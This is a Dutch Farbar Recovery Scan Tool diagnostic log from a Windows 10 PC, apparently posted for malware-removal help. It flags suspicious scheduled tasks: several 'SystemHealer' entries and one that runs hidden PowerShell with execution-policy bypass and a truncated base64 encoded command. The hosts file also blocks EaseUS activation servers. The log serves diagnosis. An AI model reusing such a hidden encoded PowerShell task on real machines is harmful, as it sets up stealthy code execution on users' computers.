Extra scanresultaten van Farbar Recovery Scan Tool (x64) Versie: 20-08-2017 Gestart door Gebruiker (04-09-2017 09:26:30) Gestart vanaf C:\Users\Gebruiker\Downloads Windows 10 Pro Versie 1703 (X64) (2017-08-30 15:06:17) Boot Modus: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-3481151055-3296067517-1742091627-500 - Administrator - Disabled) DefaultAccount (S-1-5-21-3481151055-3296067517-1742091627-503 - Limited - Disabled) Gast (S-1-5-21-3481151055-3296067517-1742091627-501 - Limited - Disabled) Gebruiker (S-1-5-21-3481151055-3296067517-1742091627-1001 - Administrator - Enabled) => C:\Users\Gebruiker ==================== Security Center ======================== (Als een item is opgenomen in de fixlist, zal het worden verwijderd.) AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Geïnstalleerde programma's ====================== (Alleen de adware-programma's met 'verborgen' vlag zou kunnen worden toegevoegd aan de fixlist om ze zichtbaar te maken. De adware-programma's moeten handmatig gedeinstallerd worden.) µTorrent (HKU\S-1-5-21-3481151055-3296067517-1742091627-1001\...\uTorrent) (Version: 3.5.0.43916 - BitTorrent Inc.) Microsoft Office Professional Plus 2016 (HKLM-x32\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-3481151055-3296067517-1742091627-1001\...\OneDriveSetup.exe) (Version: 17.3.6943.0625 - Microsoft Corporation) Opera Stable 47.0.2631.71 (HKLM-x32\...\Opera 47.0.2631.71) (Version: 47.0.2631.71 - Opera Software) Stellar Phoenix Windows Data Recovery (HKLM-x32\...\Stellar Phoenix Windows Data Recovery_is1) (Version: 7.0.0.0 - Stellar Information Technology Pvt Ltd.) TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.82216 - TeamViewer) WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH) ==================== Aangepaste CLSID (gefilterd): ========================== (Als een item is opgenomen in de fixlist, wordt uit het register verwijderd. Het bestand zal niet worden verplaatst tenzij apart vermeld.) ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (Alexander Roshal) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (Alexander Roshal) ==================== Geplande Taken (gefilterd) ============= (Als een item is opgenomen in de fixlist, wordt uit het register verwijderd. Het bestand zal niet worden verplaatst tenzij apart vermeld.) Task: {34421D46-3157-40D6-995C-28B635EECA78} - System32\Tasks\Opera scheduled Autoupdate 1504442136 => C:\Program Files\Opera\launcher.exe [2017-08-25] (Opera Software) Task: {3F11150E-CAF8-4DAB-B601-5B1838C3949B} - System32\Tasks\SystemHealer Run Delay => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== AANDACHT Task: {9F436717-BC7E-4489-BCF4-C522025EBAE0} - System32\Tasks\{090F0947-0D0A-0A0A-0B11-0C7A7A04117A} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgADsAOwA7ADsAOwA7ADsAOwA7ADsAIAA7ACAAOwA7ADsAIAAgACAAOwAgADsAIAAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQA (de data item heeft 10036 mee tekens). <==== AANDACHT Task: {A8000E36-22CA-4DCB-A456-061B65AB093A} - System32\Tasks\SystemHealer Task => C:\PROGRA~2\SYSTEM~1\RESCUE~1.EXE <==== AANDACHT Task: {EFC84305-0003-467F-8CA6-B4ACEC1CA473} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe <==== AANDACHT (Als een item is opgenomen in de fixlist, de taak (job) bestand wordt verplaatst. Het bestand dat wordt uitgevoerd door de taak zal niet worden verplaatst.) ==================== Snelkoppelingen & WMI ======================== (De items kunnen worden opgenomen in de fixlist.txt om hersteld of verwijderd te worden.) ==================== Geladen Modules (gefilterd) ============== 2017-03-18 22:58 - 2017-03-18 22:58 - 000138000 _____ () C:\Windows\SYSTEM32\inputhost.dll 2017-03-18 22:59 - 2017-03-20 05:56 - 001731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2017-08-31 00:05 - 2017-08-31 00:05 - 000074752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.856.0_x64__kzf8qxf38zg5c\SkypeHost.exe 2017-08-31 00:05 - 2017-08-31 00:05 - 000203264 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.856.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll 2017-08-31 00:05 - 2017-08-31 00:05 - 036162048 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.856.0_x64__kzf8qxf38zg5c\SkyWrap.dll 2017-08-31 00:05 - 2017-08-31 00:05 - 002237952 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.856.0_x64__kzf8qxf38zg5c\skypert.dll 2017-09-03 14:35 - 2017-08-25 15:57 - 090054232 _____ () C:\Program Files\Opera\47.0.2631.71\opera_browser.dll ==================== Alternate Data Streams (gefilterd) ========= (Als een item is opgenomen in de fixlist, alleen de ADS wordt verwijderd.) ==================== Veilige Modus (gefilterd) =================== (Als een item is opgenomen in de fixlist, wordt uit het register verwijderd. De "AlternateShell" waarde wordt hersteld.) ==================== Bestandskoppeling (gefilterd) =============== (Als een item is opgenomen in de fixlist, het registry item zal worden teruggezet naar de standaardwaarden of verwijderd.) ==================== Internet Explorer vertrouwde/beperkte toegang =============== (Als een item is opgenomen in de fixlist, wordt uit het register verwijderd.) ==================== Hosts inhoud: ========================== (Als nodig Hosts: opdracht kan worden opgenomen in de fixlist om Hosts te resetten.) 2017-03-18 23:03 - 2017-09-03 15:29 - 000000911 _____ C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 www.easeus.com 127.0.0.1 activation.easeus.com 127.0.0.1 track.easeus.com ==================== Andere gebieden ============================ (Momenteel is er geen automatische fix voor dit onderdeel.) HKU\S-1-5-21-3481151055-3296067517-1742091627-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg DNS Servers: 84.116.46.20 - 84.116.46.21 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off) Windows Firewall is ingeschakeld. ==================== MSCONFIG/TASK MANAGER Uitgeschakelde items == ==================== Firewall regels (gefilterd) =============== (Als een item is opgenomen in de fixlist, wordt uit het register verwijderd. Het bestand zal niet worden verplaatst tenzij apart vermeld.) FirewallRules: [{FA7C5268-E14F-42C3-B030-BED322548532}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office16\lync.exe FirewallRules: [{6C09D6E2-6221-41D5-A2BB-8B5872F9B082}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office16\lync.exe FirewallRules: [{09DF1ADE-E655-43C9-9534-ED1FDA5A3FD9}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe FirewallRules: [{2846691B-139E-45AB-9A27-1A43248533EB}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe FirewallRules: [{56DC8043-B22E-4223-B52B-D29889960188}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [{ACA026FD-E142-477F-8100-414A611F7D1F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [{53547183-8A05-473A-8442-A3C1D4E3E41F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{AFFDE575-F5B3-4BD9-9257-FC33DE0BEDFF}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{7634FA4D-E75A-475A-BEA7-21E514E8D778}] => (Allow) C:\Users\Gebruiker\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{24A0DE2E-C803-487A-B163-796C7BA9E295}] => (Allow) C:\Users\Gebruiker\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{A949AA04-FE54-46AC-A344-3987EA543798}] => (Allow) C:\Program Files\Opera\47.0.2631.71\opera.exe ==================== Herstelpunten ========================= 30-08-2017 17:07:21 Installatieprogramma voor Windows-modules 31-08-2017 13:48:20 Windows Back-up 03-09-2017 19:00:18 Windows Back-up ==================== Defecte Apparaatbeheer Apparaten ============= Name: CIF Single Chip Description: CIF Single Chip Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. ==================== Eventlog fouten: ========================= Applicatiefouten: ================== Error: (09/04/2017 09:20:14 AM) (Source: SideBySide) (EventID: 35) (User: ) Description: Kan activeringscontext voor 'C:\Program Files (x86)\Microsoft Office\Office16\lync.exe.Manifest' niet maken. Fout in manifest of beleidsbestand 'C:\Program Files (x86)\Microsoft Office\Office16\UccApi.DLL op regel 1. Onderdeel-id in manifest komt niet overeen met de id van het gevraagde onderdeel. Verwijzing is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0". Definitie is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0". Gebruik sxstrace.exe voor gedetailleerde diagnose. Error: (09/03/2017 07:10:03 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: De service Cryptografische services is mislukt tijdens het verwerken van aanroep OnIdentity() op het object System Writer. Details: AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol. System Error: Toegang geweigerd. . Error: (09/03/2017 07:07:09 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: De service Cryptografische services is mislukt tijdens het verwerken van aanroep OnIdentity() op het object System Writer. Details: AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol. System Error: Toegang geweigerd. . Error: (09/03/2017 07:07:00 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: De service Cryptografische services is mislukt tijdens het verwerken van aanroep OnIdentity() op het object System Writer. Details: AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol. System Error: Toegang geweigerd. . Error: (09/03/2017 07:06:50 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: De service Cryptografische services is mislukt tijdens het verwerken van aanroep OnIdentity() op het object System Writer. Details: AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol. System Error: Toegang geweigerd. . Error: (09/03/2017 07:00:19 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: De service Cryptografische services is mislukt tijdens het verwerken van aanroep OnIdentity() op het object System Writer. Details: AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol. System Error: Toegang geweigerd. . Error: (09/03/2017 07:00:10 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: De service Cryptografische services is mislukt tijdens het verwerken van aanroep OnIdentity() op het object System Writer. Details: AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol. System Error: Toegang geweigerd. . Error: (09/03/2017 03:46:56 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Naam van toepassing met fout: DllHost.exe, versie: 10.0.15063.0, tijdstempel: 0xb54cdbe6 Naam van module met fout: olmapi32.dll, versie: 16.0.4266.1001, tijdstempel: 0x55ba141c Uitzonderingscode: 0xc0000409 Foutmarge: 0x000e8099 Id van proces met fout: 0x11e4 Starttijd van toepassing met fout: 0x01d324bb1b140493 Pad naar toepassing met fout: C:\Windows\SysWOW64\DllHost.exe Pad naar module met fout: C:\PROGRA~2\MICROS~1\Office16\olmapi32.dll Rapport-id: 7dfcb8ef-79dd-4dfc-ba05-047182b2cf4f Volledige pakketnaam met fout: Relatieve toepassings-id van pakket met fout: Error: (09/03/2017 03:41:59 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Naam van toepassing met fout: DllHost.exe, versie: 10.0.15063.0, tijdstempel: 0xb54cdbe6 Naam van module met fout: olmapi32.dll, versie: 16.0.4266.1001, tijdstempel: 0x55ba141c Uitzonderingscode: 0xc0000409 Foutmarge: 0x000e8099 Id van proces met fout: 0x17d8 Starttijd van toepassing met fout: 0x01d324ba6a262f24 Pad naar toepassing met fout: C:\Windows\SysWOW64\DllHost.exe Pad naar module met fout: C:\PROGRA~2\MICROS~1\Office16\olmapi32.dll Rapport-id: 922202e5-b11d-444e-b252-073454da31db Volledige pakketnaam met fout: Relatieve toepassings-id van pakket met fout: Error: (09/03/2017 03:41:39 PM) (Source: SideBySide) (EventID: 35) (User: ) Description: Kan activeringscontext voor 'C:\Program Files (x86)\Microsoft Office\Office16\lync.exe.Manifest' niet maken. Fout in manifest of beleidsbestand 'C:\Program Files (x86)\Microsoft Office\Office16\UccApi.DLL op regel 1. Onderdeel-id in manifest komt niet overeen met de id van het gevraagde onderdeel. Verwijzing is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0". Definitie is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0". Gebruik sxstrace.exe voor gedetailleerde diagnose. Systeemfouten: ============= Error: (09/03/2017 09:19:39 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: De CldFlt-service kan vanwege de volgende fout niet worden gestart: De aanvraag wordt niet ondersteund. Error: (09/03/2017 03:38:03 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: In de machtigingsinstellingen toepassingsspecifiek wordt de machtiging Activeren niet verleend aan Lokaal voor de COM-servertoepassing met CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} en APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} aan de gebruiker NT AUTHORITY\SYSTEM SID (S-1-5-18) met het adres LocalHost (via LRPC) die wordt uitgevoerd in de toepassingscontainer Niet beschikbaar SID (Niet beschikbaar). Deze beveiligingsmachtiging kan worden gewijzigd met het beheerprogramma van Component Services. Error: (09/03/2017 03:32:02 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: De CldFlt-service kan vanwege de volgende fout niet worden gestart: De aanvraag wordt niet ondersteund. Error: (09/03/2017 03:31:31 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY) Description: Installatiefout: de volgende update kan niet worden geïnstalleerd, foutcode 0x8024001e: Definitie-update voor Windows Defender - KB2267602 (definitie 1.251.427.0). Error: (09/03/2017 03:26:42 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: De CldFlt-service kan vanwege de volgende fout niet worden gestart: De aanvraag wordt niet ondersteund. Error: (09/03/2017 03:26:42 PM) (Source: EventLog) (EventID: 6008) (User: ) Description: De vorige afsluiting van het systeem om 14:55:17 op ‎3-‎9-‎2017 is onverwacht gebeurd. Error: (09/03/2017 03:09:34 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-6HH91PQ) Description: De server {9CC0C66E-A7B9-4611-8792-EE9833277273} heeft zich niet binnen de vereiste termijn bij DCOM geregistreerd. Error: (09/03/2017 03:09:34 PM) (Source: Service Control Manager) (EventID: 7011) (User: ) Description: Time-out (30000 seconden) tijdens het wachten op een reactie op een transactie van deze service: AVKProxy. Error: (09/03/2017 03:08:28 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-6HH91PQ) Description: De server {9CC0C66E-A7B9-4611-8792-EE9833277273} heeft zich niet binnen de vereiste termijn bij DCOM geregistreerd. Error: (09/03/2017 03:08:28 PM) (Source: Service Control Manager) (EventID: 7011) (User: ) Description: Time-out (30000 seconden) tijdens het wachten op een reactie op een transactie van deze service: AVKProxy. CodeIntegrity: =================================== Date: 2017-09-01 20:45:30.541 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Common Files\G Data\AVKProxy\GDKBFltDll64.dll that did not meet the Store signing level requirements. Date: 2017-09-01 20:35:13.523 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Common Files\G Data\AVKProxy\GDKBFltDll64.dll that did not meet the Store signing level requirements. Date: 2017-09-01 20:34:59.514 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Common Files\G Data\AVKProxy\GDKBFltDll64.dll that did not meet the Store signing level requirements. ==================== Geheugen info =========================== Processor: Intel(R) Pentium(R) Dual CPU E2160 @ 1.80GHz Percentage geheugen in gebruik: 57% Totaal fysiek RAM-geheugen: 3318.49 MB Beschikbaar fysiek RAM-geheugen: 1394.42 MB Totaal Virtueel geheugen: 4662.49 MB Beschikbaar Virtual geheugen: 2607.84 MB ==================== Schijven ================================ Drive c: () (Fixed) (Total:223.08 GB) (Free:201.4 GB) NTFS Drive i: (Backup) (Fixed) (Total:260.19 GB) (Free:142.33 GB) NTFS Drive k: (Data) (Fixed) (Total:205.13 GB) (Free:127.77 GB) NTFS ==================== MBR & Partitietabel ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 223.6 GB) (Disk ID: 1E22FD50) Partition 1: (Active) - (Size=500 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=223.1 GB) - (Type=07 NTFS) ======================================================== Disk: 1 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 8850571F) Partition 1: (Not Active) - (Size=260.2 GB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=449 MB) - (Type=27) Partition 3: (Not Active) - (Size=205.1 GB) - (Type=07 NTFS) ==================== Eind van Addition.txt ============================